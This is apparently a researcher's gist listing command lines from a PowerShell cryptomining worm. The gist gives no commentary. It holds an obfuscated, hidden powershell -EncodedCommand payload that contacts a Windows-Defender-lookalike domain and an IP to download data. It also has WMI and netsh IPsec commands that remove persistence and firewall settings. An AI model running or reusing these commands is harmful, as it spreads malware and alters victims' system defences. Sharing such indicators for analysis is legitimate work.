Gal Abadi galabadi
galabadi
/ Powershell crypto worm commandlines
Created
May 23, 2018 13:20
Powershell crypto worm commandlines
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| powershell.exe -NoP -NonI -W Hidden -E JABzAGUAPQBAACgAJwAxADkANQAuADIAMgAuADEAMgA3AC4AOQAzACcALAAnAHUAcABkAGEAdABlAC4AdwBpAG4AZABvAHcAcwBkAGUAZgBlAG4AZABlAHIAaABvAHMAdAAuAGMAbAB1AGIAJwAsACcAaQBuAGYAbwAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcAKQAKACQAbgBpAGMAPQAnAHcAdwB3AC4AdwBpAG4AZABvAHcAcwBkAGUAZgBlAG4AZABlAHIAaABvAHMAdAAuAGMAbAB1AGIAJwAKAGYAbwByAGUAYQBjAGgAKAAkAHQAIABpAG4AIAAkAHMAZQApAAoAewAKACAAIAAgACAAJABwAGkAbgA9AHQAZQBzAHQALQBjAG8AbgBuAGUAYwB0AGkAbwBuACAAJAB0AAoACgAgACAAIAAgAGkAZgAgACgAJABwAGkAbgAgAC0AbgBlACAAJABuAHUAbABsACkACgAgACAAIAAgAHsACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAAKACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsACgAgACAAIAAgAH0ACgB9AAoAJABuAGkAYwA9ACQAbgBpAGMAKwAiADoAOAAwADAAMAAiAAoAJAB2AGUAcgA9ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACIAaAB0AHQAcAA6AC8ALwAkAG4AaQBjAC8AdgBlAHIALgB0AHgAdAAiACkALgBUAHIAaQBtACgAKQAgAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAAoAIAAgACAAIABpAGYAKAAkAHY |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Get-WmiObject CommandLineEventConsumer -namespace root\subscription | Where-Object {$_.Name -match ('SCM Event Consumer')} | Select-Object -first 1 | Remove-WmiObject | |
| Get-WmiObject __EventFilter -namespace root\subscription | Where-Object {$_.Name -match ('SCM Event Filter')} | Select-Object -first 1 | Remove-WmiObject | |
| netsh.exe ipsec static delete policy name=netbc | |
| netsh.exe ipsec static delete filteraction name=block | |
| netsh.exe ipsec static delete filterlist name=block |